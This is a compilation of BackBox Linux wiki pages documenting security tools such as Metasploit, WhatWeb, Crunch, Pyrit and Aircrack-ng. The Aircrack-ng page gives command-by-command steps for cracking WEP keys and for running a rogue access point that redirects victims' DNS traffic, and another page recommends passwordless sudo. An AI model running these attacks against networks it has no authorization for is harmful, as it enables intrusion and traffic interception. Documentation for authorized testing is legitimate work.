Category:Tools usage

On this section you will get the opportunity to find some documentation related to the tools that are
included in BackBox Linux. Our goal is implementation of a complete documentation for each tool
where the users can consult and get more familiar with it.
Get involved and help us to implement high quality documentation.

Subcategories
This category has the following 7 subcategories, out of 7 total.

M
Documentation & Reporting

W
Miscellaneous

P
Exploitation

Privilege Escalation

V
Information Gathering

Vulnerability Assessment

Wireless Analysis

Dradis
This is the approved revision of this page, as well as being the most recent.

Dradis
Home page: http://dradisframework.org
Dradis guides: http://guides.dradisframework.org
Dradis is a easy to use and very effective system to share information in penetration testing
(see[1] ).
For tutorials and videos visit [2]

and [3]

Installation
You just need to open up a terminal and type:
$ sudo apt-get install dradis
this will manage all of the related dependencies. Then you will have the following new entries in the
Backbox main menu:
Auditing > Documentation & Reporting > Dradis
and
Services > dradis > (dradis reset / dradis start)
After finishing above installation you will need to start the service dradis reset so you will be able
to get all the "missing gems" in your Ruby installation. Most likely you will see the following
message:
[...]
Some Ruby gems are missing, do you want to install them now? [y]
Type y and you will get:
Ok then, I am going to run bundle install for you,
then you should run this script again.
[...]
Wait until the following message is displayed:
Your bundle is complete! Use `bundle show [gemname]`
to see where a bundled gem is installed.
Now run the dradis reset service once again:
The Gemfile's dependencies are satisfied
The config file [config/database.yml.template] was found not to be ready to use.
Do you want to initialize it? [y]es | [N]o | initialize [a]ll
Just type y and wait until the following info are displayed:
[...]

[ DONE ]
** Saving backup...
[
** Backup Saved as: /opt/dradis/server/backup/dradis_2011-xx-xx_1.zip
** Deleting all attachments...
[
** Cleaning database...
[
** Seeding database...
[
** Deleting all log files...
[
In order to check your installation you may also want to run the service dradis verify. If your
installation has been successful you will have:
Dradis Framework dependencies verification script
[...]
Running Standard checks.
[...]
Congratulations. You seem to be ready to run the Dradis Framework.
[...]
Now your Dradis installation is complete and perfectly working.

Basic Usage
To run Dradis you need to run the dradis start service:
Services > dradis > dradis start
then navigate through the menu and click on Dradis:
Auditing > Documentation & Reporting > Dradis
The first time you will be connected to the wizard via browser:
https://localhost:3004/wizard
the next time, in the initialisation process, you will be asked to provide a password and create or
open a project:
https://localhost:3004/sessions/init

DONE ]
DONE
DONE
DONE
DONE

]
]
]
]

Armitage
This is the approved revision of this page, as well as being the most recent.

Contents [hide]
1 How to start Armitage
1.1 About
1.2 Update Metasploit
1.3 How to start Armitage

How to start Armitage

About
Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets,
recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to
make Metasploit usable for security practitioners who understand hacking but don't use Metasploit
every day. If you want to learn Metasploit and grow into the advanced features, Armitage can help
you.

Update Metasploit
sudo msfupdate

How to start Armitage

Before to start to use Armitage you may need to have postgresql installed already on your system.
You can follow the steps by clicking here
Once you have the above requirement and the a database, navigate through the menu:
Auditing > Exploitation > Network Exploitation > Armitage
When you start Armitage it will appear the connection pop-up, click on connect and leave the other
parameters in default.
If the Metasploit RPC server doesn't started Armitage it would prompt pop-up by asking if you'd like
to start it, than you should just click on yes. It will appear the connection progress bar with
connection status to the database.
The Metasploit RPC server will start in background the service. You will get/view several times the
connection refues message. Do not worry about it because that means armitage is still checking if
the server that not ready.
If you experiencing any problem to connect the db you should set your own username and
password by editing the file:
sudo nano /opt/config/database.yml

Category: Network Exploitation

Metasploit
This is the approved revision of this page, as well as being the most recent.

Contents [hide]
1 How to Metasploit with postgresql
1.1 About
1.2 Update Metasploit
1.3 Database installation
1.4 Configure Metasploit
1.5 Enable the database on startup
1.6 Troubleshooting
1.7 To list databases
1.8 How To drop a database
1.9 To drop a user

How to Metasploit with postgresql

About
The Metasploit Framework is both a penetration testing system and a development platform for
creating security tools and exploits. The framework is used by network security professionals to
perform penetration tests, system administrators to verify patch installations, product vendors to
perform regression testing, and security researchers world-wide. The framework is written in the
Ruby programming language and includes components written in C and assembler.

Update Metasploit
user@backbox:~$ sudo msfupdate

Database installation
Postgresql is the recommended database:
user@backbox:~$ sudo apt-get install postgresql libpgsql-ruby libpq-dev
user@backbox:~$ sudo gem install pg
Become the system postgres user:
user@backbox:~$ sudo su postgres
Creating a database user:
postgres@backbox:~$ createuser -D -P -R -S backbox
Enter password for new role: backbox
Enter it again: backbox
Creating a database:
postgres@backbox:~$ createdb --owner=backbox metasploit4
postgres@backbox:$ exit

Configure Metasploit
Start the framework, then enter the following commands:
msf > db_connect backbox:[password]@127.0.0.1:5432/metasploit4
or simply:
msf > db_connect -y /opt/backbox/config/database.yml
msf > workspace -a MyProject

Enable the database on startup

cat > ~/.msf4/msfconsole.rc
db_connect backbox:[password]@127.0.0.1:5432/metasploit4

Troubleshooting
If you run into issues, or need to modify the user or database, you can always use the psql
command to do this. Asusming you're using IDENT authentication (default on BackBox), you'll have
to become the system's postgres ('postgres' on BackBox) user before you can modify users or
databases with psql.

To list databases
postgres@backbox:~$ psql -l

How To drop a database

Postgres provides a handy 'dropdb' command.
postgres@backbox:~$ dropdb metasploit4

To drop a user
Postgres provides a handy 'dropuser' command.
postgres@backbox:~$ dropuser backbox
For more information, please visit: https://community.rapid7.com/docs/DOC-1268
Category: Network Exploitation

Sudo without password

This is the approved revision of this page; it is not the most recent. View the most recent revision.

I am sure you will agree with me that every time we enter "sudo" we are prompted with password
request! Well, we can get around it this way:
Open shell and type:
user@backbox:~$ sudo visudo
Add the following line to the END of the file:
<username> ALL=NOPASSWD: ALL
Replace <username> with your user name (without the <>).
Example:
michael ALL=NOPASSWD: ALL
Hit Ctrl + o + Enter to confirm, and Ctrl + x to save and exit.
That's it from now on, everytime you type "sudo", you wont be prompted for password!

Anonymous Surfing
This is the approved revision of this page, as well as being the most recent.

BackBox Linux include also a suite of tools that allow users to navigate in complete anonymous
way.
In this tutorial we will be showing very shortly how to setup/configure and usage of these tools such
as Tor and Polipo.

Tor and Polipo

Polipo is a small and fast caching web proxy. You will find it already installed on BackBox so you
will need just to start if you'd like to use it.
To do that:
service -> polipo -> polipo start
by starting Polipo we have the web proxy running on default port 8118.
Once we have started the proxy we will proceed with Tor, which is a free software implementation of
second-generation onion routing, a system enabling its users to communicate anonymously on the
Internet.
To proceed we will need to run the Vidalia GUI in desktop menu, or alternatively we can proceed
from terminal as follow:
sudo tor
To start the Tor services.

Configure Tor on Firefox

It is pretty easy the configuration of proxy on Firefox, in order to be able to navigate in total
anonymity we can proceed from Firefox interface:
edit -> Preferences -> Advanced -> Network
Select Use custom proxy settings and fill up the HTTP Proxy section as follow:
127.0.0.1 Port: 8118
The SOCKS Host section:
127.0.0.1 Port: 9050
Just to make sure that everything working correctly click on Test Settings to test if proxy is
running, if this has success go to https://check.torproject.org/ to check if Tor is correctly running.
Enjoy your anonymity!

Whatweb
This is the approved revision of this page, as well as being the most recent.

Contents [hide]
1 WhatWeb - Next generation web scanner
1.1 Description
1.2 Example Usage
1.3 Verbose Output
1.4 Log Output
1.5 Brief Logging
1.6 XML Logging
1.7 Plugins

WhatWeb - Next generation web scanner

WhatWeb - Next generation web scanner. Version 0.4.6 by Andrew Horton aka urbanadventurer
from Security-Assessment.com
Homepage: http://www.morningstarsecurity.com/research/whatweb

Description
WhatWeb can be stealthy and fast, or thorough but slow. WhatWeb supports an aggression level to
control the trade off between speed and reliability. When you visit a website in your browser, the
transaction includes many hints of what web technologies are powering that website. Sometimes a
single webpage visit contains enough information to identify a website but when it does not,
WhatWeb can interrogate the website further. The default level of aggression, called passive, is
the fastest and requires only one HTTP request of a website. This is suitable for scanning public
websites. More aggressive modes were developed for in penetration tests.
Most WhatWeb plugins are thorough and recognise a range of cues from subtle to obvious. For
example, most WordPress websites can be identified by the meta HTML tag, e.g. , but a minority
of WordPress websites remove this identifying tag but this does not thwart WhatWeb. The
WordPress WhatWeb plugin has over 15 tests, which include checking the favicon, default
installation files, login pages, and checking for /wp-content/ within relative links.

Example Usage
whatweb [options] <URLs>
Using WhatWeb on a handful of websites, standard WhatWeb output is in colour.
backbox@backbox:~$ whatweb google.it

http://google.it [301] X-XSS-Protection[1; mode=block], HTTPServer[gws],

RedirectLocation[1] , UncommonHeaders[x-xss-protection], IP[74.125.39.103],
Title[301 Moved], Country[UNITED STATES][US]
http://www.google.it/ [200] X-XSS-Protection[1; mode=block], HTTPServer[gws], UncommonHeaders[x-xss-protection], HTML5, IP[74.125.39.99],
Cookies[NID,PREF], Title[Google], Country[UNITED STATES][US]

Verbose Output
backbox@backbox:~$ whatweb -v www.morningstarsecurity.com
www.morningstarsecurity.com/ [200]
http://www.morningstarsecurity.com [200] WordPress[3.0.1],
Google-API[ajax/libs/jquery/1.3.2/jquery.min.js ], Google-Analytics[GA][791888],
HTTPServer[Apache], UncommonHeaders[x-pingback], JQuery[1.4.2],
Title[MorningStar Security], MetaGenerator[WordPress 3.0.1], RSSFeed[2] ,
MD5[59f20aef7452702787fff7ec46733501], Tag-Hash[2e45809b1f8a1ecf782757d8dbafbb08],
Header-Hash[dba021c0aa225c8eede02c7dcc45b0d8], Footer-Hash[d0efcc9da7c8c45eb1e2ac5b8d5b354e]
Footer-Hash
Google-API
Google-Analytics
HTTPServer
Header-Hash
JQuery
MD5
MetaGenerator
RSSFeed
Tag-Hash
Title
UncommonHeaders
WordPress

=> hash (string: d0efcc9da7c8c45eb1e2ac5b8d5b354e)

=> google javascript API (version: ajax/libs/jquery/1.3.2/jquery.min.js )
=> pageTracker = ...UA-123-1231 (string: GA,accounts: 791888)
=> server string (string: Apache)
=> hash (string: dba021c0aa225c8eede02c7dcc45b0d8)
=> script (version: 1.4.2)
=> md5 hash of html (string: 59f20aef7452702787fff7ec46733501)
=> meta generator tag (string: WordPress 3.0.1)
=> rss link type, rss link (string: http://www.morningstarsecurity.com/wp-content/themes/pyrmont-v2-white/style.css
=> tag pattern hash (string: 2e45809b1f8a1ecf782757d8dbafbb08)
=> page title (string: MorningStar Security)
=> headers (string: x-pingback)
=> wp-content (certainty: 75), meta generator tag (version: 3.0.1), Relative /wp-content/ link

Log Output
There are currently 6 types of log output. They are:
--log-brief=FILE
Log brief, one-line output. Default output.
--log-full=FILE
Log verbose output (might be removed in future)
--log-xml=FILE
Log XML format
--log-json=FILE
Log JSON format
--log-json-verbose=FILE Log JSON Verbose format
--log-errors=FILE
Log errors. This is usually printed to the screen in red.
You can output to multiple logs simultaneously by specifying multiple command line logging
options.

Brief Logging
backbox@backbox:~$ whatweb --brief-full b.log digg.com

http://digg.com [200] X-Powered-By[PHP/5.2.9-digg8], Cookies[1337,PHPSESSID,ccc], UncommonHeaders[keep-alive], Title[Digg - The Latest News

Headlines, Videos and Images], HTTPServer[Apache], Mailto, Header-Hash[2df7eaaa4480f28013aaf48ae9266b84], MD5[24bc43e698e5d1388e836f5eee094fbe],
Footer-Hash[ca2ffbc939969a2246cde196f0fc4841], Div-Span-Structure[828d809947c3c760d41c720c9203993b]
This is one connection per line and is search-able with grep.

XML Logging
The XML logging is currently naive and may change. Please contact me if you have suggestions.
whatweb --log-xml x.log digg.com

Plugins
Matches are made with:
Text strings (case sensitive)
Regular expressions
Google Hack Database queries (limited set of keywords)
MD5 hashes
URL recognition
HTML tag patterns
Custom ruby code for passive and aggressive operations
Show the plugin list:
backbox@backbox:~$ whatweb -l
To view more detail about a plugin or plugins:
backbox@backbox:~$ whatweb -I phpBB

Category: Web Applications Analysis

Crunch
This is the approved revision of this page, as well as being the most recent.

Contents [hide]
1 Crunch
1.1 Usage
1.2 Example Usage
1.3 Charset
1.4 Charset Example

Crunch
Homepage: http://sourceforge.net/projects/crunch-wordlist/
Crunch is a wordlist generator which can use a default character set or a character set you specify.
Crunch can generate all possible combinations and permutations of words.

Usage
backbox@backbox:~$ crunch [minlength] [maxlength] [charset] -o
path/wordlist.txt

Example Usage
backbox@backbox:~$ crunch 4 4 ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 -o
/home/username/wordlist.txt
Specify the minimum lenght and maximum lenght of the wordlist:
backbox@backbox:~$ crunch 4 4<
Specify a character set to create the wordlist:
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
Specify a path to save the output wordlist file, for instance "wordlist.txt":
-o /home/username/wordlist.txt

Charset
Charset is a set of characters, can be chosen from the file charset.lst.

Charset Example
View all charset in the file charset.lst:
backbox@backbox:~$ crunch 4 4 -f charset.lst mixalpha-sv -o /home/username
/Desktop/wordlist.txt

Category: Password Cracking

Aircrack-ng
This is the approved revision of this page, as well as being the most recent.

Contents [hide]
1 ChopChop WEP Cracking
1.1 Scan for available WEP access points
1.2 Monitor the channel
1.3 Fake AP authentication
1.4 Collecting the packets
1.5 Forge an ARP packet
1.6 Capture data
1.7 Inject the ARP packet
1.8 WEP Cracking
2 Use airolib-ng to generate precomputed PMKs
3 How to create a rogue (fake) access point
3.1 Configure the dhcp server
3.2 Create the rogue AP and put the wifi in monitor mode
3.3 Set the subnet and the gateway
3.4 Start the DHCP daemon
3.5 Setup iptables rules

ChopChop WEP Cracking

This is a small guide on how to crack a WEP key with the ChopChop attack with no clients.
Let's assume the following:
ExampleAP is going to be the ESSID (ap name) of the access point you want to crack
00:25:FE:E1:12:43 is the BSSID (mac address) of the ap
The target ap is on channel 10
Your wireless interface supports the injection and its name is wlan0
00:11:22:33:44:55 is your wlan0 mac address

Scan for available WEP access points

First of all, make sure your wlan0 interface is not bound to any existing ap, to make sure:
ps -aux | grep dhclient | grep wlan0
And eventually kill the dhclient process.
Then, you have to put wlan0 in monitor mode:
user@backbox # sudo airmon-ng start wlan0
You are going to get a mon0 interface (wlan0 monitor interface). Let's start airodump to scan for
alive WEP networks :
user@backbox # sudo airodump-ng --encrypt WEP
And wait for a while. Once you have found your target AP, take note of its ESSID (name), channel
and BSSID (hardware address) and close airodump-ng with CTRL+C .

Monitor the channel

Stop the monitor interface, and restart it on the AP channel:

user@backbox # sudo airmon-ng stop mon0
user@backbox # sudo airmon-ng stop wlan0
user@backbox # sudo airmon-ng start wlan0 10

Fake AP authentication
Once you have your mon0 on channel 10, start a fake authentication with the command:
user@backbox # sudo aireplay-ng -1 0 -e ExampleAP -a 00:25:FE:E1:12:43 -h
00:11:22:33:44:55 mon0

Collecting the packets

Start collecting some packets with:
user@backbox # sudo aireplay-ng -4 -h 00:11:22:33:44:55 -b 00:25:FE:E1:12:43
mon0
And wait until aireplay find a packet you can use to forge a new one and asks you for confirmation,
this will generate an .xor packet.

Forge an ARP packet

Once aireplay has found a usefull packet, you have to forge a new one (an ARP one) with
packetforge-ng:
user@backbox # packetforge-ng -0 -a 00:25:FE:E1:12:43 -h 00:11:22:33:44:55 -k
255.255.255.255 -l 255.255.255.255.255 -y packet.xor -w forged-arp-packet
(Modify the 'packet.xor' string with the name of the packet generated by aireplay).
Now you have your 'forged-arp-packet' packet to inject.

Capture data
In a new terminal, start capturing AP data:
user@backbox # sudo airodump-ng -c 10 --bssid 00:25:FE:E1:12:43 mon0

Inject the ARP packet

And start the packet injection:
user@backbox # sudo aireplay-ng -2 -r forged-arp-packet mon0

WEP Cracking
Once the injection process it's started, you should see a LOT of captured data from airodump, when
you have enough of them, start the cracking process:
user@backbox # aircrack-ng -b 00:25:FE:E1:12:43 *.cap

Use airolib-ng to generate precomputed PMKs

This guide will guide you to create a precomputed Pairwise Master Keys db from a given essid.
First of all, let's create a file called (for instance) "myessid.txt" which contains the ESSID we want
to generate PMKs for:
user@backbox # echo 'essid-name' > myessid.txt
Then, let's create the main db (example-db for instance) importing the essid :
user@backbox # airolib-ng example-db --import essid myessid.txt
Let's import a wordlist file (passwords.txt in the following example):
user@backbox # airolib-ng example-db --import passwd passwords.txt
Clean the db:
user@backbox # airolib-ng example-db --clean all
Let's start the PMKs computing with:
user@backbox # airolib-ng example-db --batch
The computation will take a while, in the meantime take a coffee and, if you want to check the db
status, just run the command:
user@backbox # airolib-ng example-db --stats
At the end, you will be able to use the db with aircrack:
user@backbox # aircrack-ng -r example-db psk*.cap

How to create a rogue (fake) access point

Here there's a little guide on how to create a rogue access point, you are going to need:
An external wifi adapter to connect to the internet (wlan1)
A gateway (for instance 192.168.1.1)
An internal wifi adapter to create the rogue AP (wlan0)

Configure the dhcp server

Open a terminal and write:
nano /etc/dhcp3/dhcpd.conf (ENTER)
Copy the following string to the dhcpd.conf file:
ddns-update-style ad-hoc;
default-lease-time 600;

max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 4.2.2.2;
range 192.168.2.130 192.168.2.140;
}

Then save and close the file with CTRL + X -> Y -> ENTER.

Create the rogue AP and put the wifi in monitor mode

Use the following command:
airmon-ng
airmon-ng start wlan0
airbase-ng -e "FAKE-AP-NAME" -c 9 mon0
This will create a monitor interface (ath0) and start the rogue ap called "FAKE-AP-NAME" on
channel 9, you will have the following output:
20:54:01 Create tap interface mon0
20:54:01 Trying to set MTU on ath0 to 1500
20:54:01 Trying to set MTU on mon0 to 1800
20:54:01 Access Point with BSSID 00:242:A1:40:8E started

Set the subnet and the gateway

ifconfig ath0 up
ifconfig ath0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129<

Start the DHCP daemon

mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid ath0

Setup iptables rules

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface ath0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1
Now you have your rogue AP running! :)
Category: Cracking

Pyrit
This is the approved revision of this page, as well as being the most recent.

Pyrit is a great tool for WPA/WPA2-PSK cracking. It brings the power of multi-core platforms such
as ATI-Stream, Nvidia CUDA and OpenCL to bruteforce wireless attacks.
For more information, please refer to the following link: http://code.google.com/p/pyrit/
These are the main features:
GPU and CPU Computing
Precomputed Hash with/out Database
Live Capture and Cracking
Analysis and Cleaning of useless captured packet
Direct use of dictionary and cap file compressed in gzip format
Distributed Wpa Cracking

Contents [hide]
1 Requirements
2 Installation
2.1 NVIDIA-CUDA
2.2 AMD-OpenCL
2.3 AMD-APP and CAL++
2.4 Uninstall
3 Using Pyrit with Postgresql
3.1 Postgresql Installation
3.2 Usage

Requirements
You need to install the proper drivers and toolkit for your video-card:
How to install Nvidia CUDA drivers and toolkit
How to install AMD driver and AMD APP SDK

Installation
First, you need to install the main module:
sudo apt-get install python-dev libssl-dev libpcap-dev zlib1g-dev
svn checkout http://pyrit.googlecode.com/svn/trunk/ $HOME/pyrit_svn
cd $HOME/pyrit_svn/pyrit
python setup.py build
sudo python setup.py install --record pyrit_file.txt
At this point you need to install other support modules according to your platform:

NVIDIA-CUDA
cd $HOME/pyrit_svn/cpyrit_cuda
python setup.py build
sudo python setup.py install --record cuda_file.txt

AMD-OpenCL
cd $HOME/pyrit_svn/cpyrit_opencl
sed -i 's/ATISTREAMSDKROOT/AMDAPPSDKROOT/g' setup.py
python setup.py build
sudo python setup.py install --record opencl_file.txt

AMD-APP and CAL++

This module makes use of the CAL++ library, which you need to install. It allows AMD CAL kernels
to be written directly in C++,
so it is intended to give better performances in general. It should be supported by AMD-APP-SDK
up to version 2.5.
sudo apt-get -y install cmake libboost-date-time-dev
svn co https://calpp.svn.sourceforge.net/svnroot/calpp/trunk $HOME/calpp
cd $HOME/calpp
sed -i.bak 's/ATISTREAMSDKROOT/AMDAPPSDKROOT/g' CMakeLists.txt
cmake .
make

sudo make install

cd $HOME/pyrit_svn/cpyrit_calpp
sed -i.bak -e 's/ATISTREAMSDKROOT/AMDAPPSDKROOT/g' -e "s/'include'/'include\/CAL'/" -e 's/0.4.0-dev/0.4.1-dev/' setup.py
python setup.py build
sudo bash -c "export AMDAPPSDKROOT=/opt/AMDAPP && python setup.py install --record calpp_file.txt"
then reboot.

Uninstall
cat $HOME/pyrit_svn/pyrit/pyrit_file.txt | sudo xargs rm -rf
cat $HOME/pyrit_svn/cpyrit_cuda/cuda_file.txt | sudo xargs rm -rf
cat $HOME/pyrit_svn/cpyrit_opencl/opencl_file.txt | sudo xargs rm -rf
cat $HOME/pyrit_svn/cpyrit_calpp/calpp_file.txt |sudo xargs rm -rf
rm -rf $HOME/pyrit_svn

Using Pyrit with Postgresql

Postgresql Installation
sudo apt-get install python-sqlalchemy python-psycopg2 postgresql
sudo su postgres
createuser -D -P -R -S backbox
createdb -O backbox pyrit
exit
sed -i 's|file://|postgres://backbox:[password]@localhost/pyrit|' ~/.pyrit/config

Usage
Pyrit 0.4.1-dev (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Usage: pyrit [options] command
Recognized options:
-b
: Filters AccessPoint by BSSID
-e
: Filters AccessPoint by ESSID
-h
: Print help for a certain command
-i
: Filename for input ('-' is stdin)
-o
: Filename for output ('-' is stdout)
-r
: Packet capture source in pcap-format
-u
: URL of the storage-system to use
--all-handshakes : Use all handshakes instead of the best one
Recognized commands:
analyze
: Analyze a packet-capture file
attack_batch
: Attack a handshake with PMKs/passwords from the db
attack_cowpatty
: Attack a handshake with PMKs from a cowpatty-file
attack_db
: Attack a handshake with PMKs from the db
attack_passthrough
: Attack a handshake with passwords from a file
batch
: Batchprocess the database
benchmark
: Determine performance of available cores
benchmark_long
: Longer and more accurate version of benchmark (~10 minutes)
check_db
: Check the database for errors
create_essid
: Create a new ESSID
delete_essid
: Delete a ESSID from the database
eval
: Count the available passwords and matching results
export_cowpatty
: Export results to a new cowpatty file
export_hashdb
: Export results to an airolib database
export_passwords
: Export passwords to a file
help
: Print general help
import_passwords
: Import passwords from a file-like source
import_unique_passwords : Import unique passwords from a file-like source
list_cores
: List available cores
list_essids
: List all ESSIDs but don't count matching results
passthrough
: Compute PMKs and write results to a file
relay
: Relay a storage-url via RPC
selftest
: Test hardware to ensure it computes correct results
serve
: Serve local hardware to other Pyrit clients
strip
: Strip packet-capture files to the relevant packets
stripLive
: Capture relevant packets from a live capture-source
verify
: Verify 10% of the results by recomputation

Category: Cracking

Siege
This is the approved revision of this page, as well as being the most recent.

OpenSource HTTP Load Tester and Benchmarking Utility - Siege

Web site: http://www.joedog.org/index/siege-home

Description
Siege reports the total number of hits recorded, bytes transferred, response time, concurrency, and
return status. Most features are configurable with command line options which also include default
values to minimize the complexity of the program's invocation.
Siege allows you to stress a web server with 'n' number of users for 't' number of times, where n and t
are defined by the user. It records the duration time of the test as well as the duration of each single
transaction.
Siege reports the number of transactions, elapsed time, bytes transferred, response time, transaction
rate, concurrency and the number of times the server responded OK, that is status code 200. Siege
was designed and implemented by Jeffrey Fulmer in his position as Webmaster for Armstrong World
Industries .

Example
Here is the simple example of using siege:
user@backbox # siege --concurrent=50 --internet --benchmark --time=20m
http://www.someurl.com/index.html
Check siege man pages for more options .
Category: Stress Testing

Cms-explorer
This is the approved revision of this page, as well as being the most recent.

Contents [hide]
1 CMS Explorer
1.1 Description
1.2 Usage
1.3 Options
1.4 Example Usage

CMS Explorer
CMS Explorer - Discover the CMS components behind the site
Homepage : http://code.google.com/p/cms-explorer/
Wiki : http://code.google.com/p/cms-explorer/wiki/Usage

Description
CMS Explorer is designed to reveal the the specific modules, plugins, components and themes that
various CMS driven web sites are running.
Additionally, CMS Explorer can be used to aid in security testing. While it performs no direct
security checks, the "explore" option can be used to reveal hidden/library files which are not
typically accessed by web clients but are nonetheless accessible. This is done by retrieving the
module's current source tree and then requesting those file names from the target system. These
requests can be sent through a distinct proxy to help "bootstrap" security testing tools like Burp,
Paros, Webinspect, etc.
CMS Explorer can also search OSVDB for vulnerabilities with the installed components.
CMS Explorer currently supports module/theme discovery with the following products:
* Drupal
* Wordpress
* Joomla!
* Mambo
And exploration of the following products:
* Drupal
* Wordpress

Usage
backbox@backbox:~$ cms-explorer
*****************************************************************
WARNING: No osvdb.org API key defined, searches will be disabled.
*****************************************************************

ERROR: Missing -url

backbox@backbox:~$ cms-explorer -url url -type type [options]

Options:
-bsproxy+
Proxy to route findings through (fmt: host:port)
-explore Look for files in the theme/plugin dir
-help
This screen
-osvdb Do OSVDB check for finds
-plugins Look for plugins (default: on)
-pluginfile+
Plugin file list
-proxy+ Proxy for requests (fmt: host:port)
-themes Look for themes (default: on)
-themefile+
Theme file list (default: themes.txt)
-type+* CMS type: Drupal, Wordpress, Joomla, Mambo
-update Update lists from Wordpress/Drupal (over-writes text files)
-url+* Full url to app's base directory
-verbosity+
1-3

*Requires value
* Required option

Options

* bsproxy (requires value): The proxy to route any found files through. Format can be like 'http://host:port/' , 'host:port' or just 'host'. If
* explore: Look for additional theme/plugin files. Only supported for Drupal and Wordpress.
* osvdb: Check osvdb.org for vulnerabilities in the installed components. Requires an API key be in a file called osvdb.key.
* plugins: Look for plugins/module/component files. By default this is enabled and both plugins and themes will be checked.
* pluginfile+ (requires value): Alternative plugin file list.
* proxy+ (requires value): Proxy for base requests. Format can be like 'http://host:port/' , 'host:port' or just 'host'. If port is not specifi
* themes (requires value): Look for themes. By default this is enabled and both plugins and themes will be checked.
* themefile+ (requires value): Alternative theme file list.
* type+ (required, requires value): The CMS type to be tested: Drupal, Wordpress, Joomla/Mambo.
* update: Update the default lists from Wordpress and Drupal. This over-writes the current files with fresh copies.

* url+ (required, requires value): Full URL to application's root directory (where the CMS is installed)
* -verbosity+ (requires value): 1-3 in increasing levels of output.

Example Usage
Test for Wordpress plugins and themes against example.com, with low verbosity and explore for
additional files. Route all "found" items using the bootstrap proxy running on port 8080 of localhost.
backbox@backbox:~$ cms-explorer -url http://example.com/
localhost:8080 -explore -type wordpress

-v 1 -bsproxy

Test for Wordpress themes on example.com using themelist.txt, with full verbosity and explore
using the bootstrap proxy on port 80 of localhost.
backbox@backbox:~$ cms-explorer -url http://example.com/ -v 3 -bsproxy
localhost -explore -themes -themefile themelist.txt -type wordpress
Test for Drupal plugins/themes on example.com, with normal verbosity and no exploration.
backbox@backbox:~$ cms-explorer -url http://example.com/

-type drupal

Test for Mambo (or Joomla) components/modules and templates, and search OSVDB.
backbox@backbox:~$ cms-explorer -url http://example.com/

Category: Web Applications Analysis

-type joomla -osvdb

Knock
This is the approved revision of this page, as well as being the most recent.

Contents [hide]
1 Knock
1.1 Description
1.2 Usage
1.3 Rapid Scan
1.4 Options
1.5 Example

Knock
Source code web site: http://code.google.com/p/knock/

Description
Knock is a python script, written by Gianni 'guelfoweb' Amato, designed to enumerate subdomains
on a target domain through a wordlist.

Usage
backbox@backbox:~$ knock <option> <url>

Rapid Scan
Scanning with internal wordlist:
backbox@backbox:~$ knock <url>
Scanning with external wordlist:
backbox@backbox:~$ knock <url> <wordlist>

Options
-zt Zone Transfer discovery:
backbox@backbox:~$ knock -zt <url>
-dns Dns resolver:
backbox@backbox:~$ knock -dns <url>
-wc Wildcard testing:
backbox@backbox:~$ knock <url>
-wc Wildcard bypass:
backbox@backbox:~$ knock -bw <stringexclude> <url>

Example
backbox@backbox:~$ knock -dns http://www.google.it
Knock v1.5 by Gianni 'guelfoweb' Amato ( http://knock.googlecode.com

[+] Testing domain

www.www.google.it 212.48.8.140
[+] Dns resolving
Domain name Ip address Name server
http://www.google.it 74.125.39.105 fx-in-f105.1e100.net
http://www.google.it 74.125.39.106 fx-in-f106.1e100.net
http://www.google.it 74.125.39.147 fx-in-f147.1e100.net
http://www.google.it 74.125.39.99 fx-in-f99.1e100.net
http://www.google.it 74.125.39.103 fx-in-f103.1e100.net
http://www.google.it 74.125.39.104 fx-in-f104.1e100.net
Found 6 host(s) for http://www.google.it

Category: Network Analysis

Modifying BackBox packages

This is the approved revision of this page, as well as being the most recent.

Enable the source code repository:

backbox@backbox:~$ sudo nano /etc/apt/sources.list.d/backbox-two-natty.list
add the following string:
deb-src http://ppa.launchpad.net/backbox/two/ubuntu

natty main

In our example well customize the weevely tool. Type on terminal the following commands:
backbox@backbox:~$ sudo apt-get update
backbox@backbox:~$ apt-get source weevely
After few seconds in your directory youll find the subsequent files:
weevely_0.5-0backbox1.diff.gz
weevely_0.5-0backbox1.dsc
weevely_0.5.orig.tar.gz
and the source folder:
backbox@backbox:~$ ls weevely-0.5
After making the necessary changes, before creating the new deb archive, the installation of some
packets is needed:
backbox@backbox:~$ sudo apt-get install devscripts
Open the "debian/control" file and check the compilation needed dependences, in the example
examined:
[...]
Build-Depends: debhelper (>= 7)
[...]
After this check type on terminal:
backbox@backbox:~$ sudo sudo apt-get install debhelper
Now the new packet creation is possible:
backbox@backbox:~$ cd weevely-0.5
backbox@backbox:~/weevely-0.5$ debuild binary
Otherwise, if preferred, create the debian source to be uploaded on the Launchpad repository:

backbox@backbox:~/weevely-0.5$ debuild clean

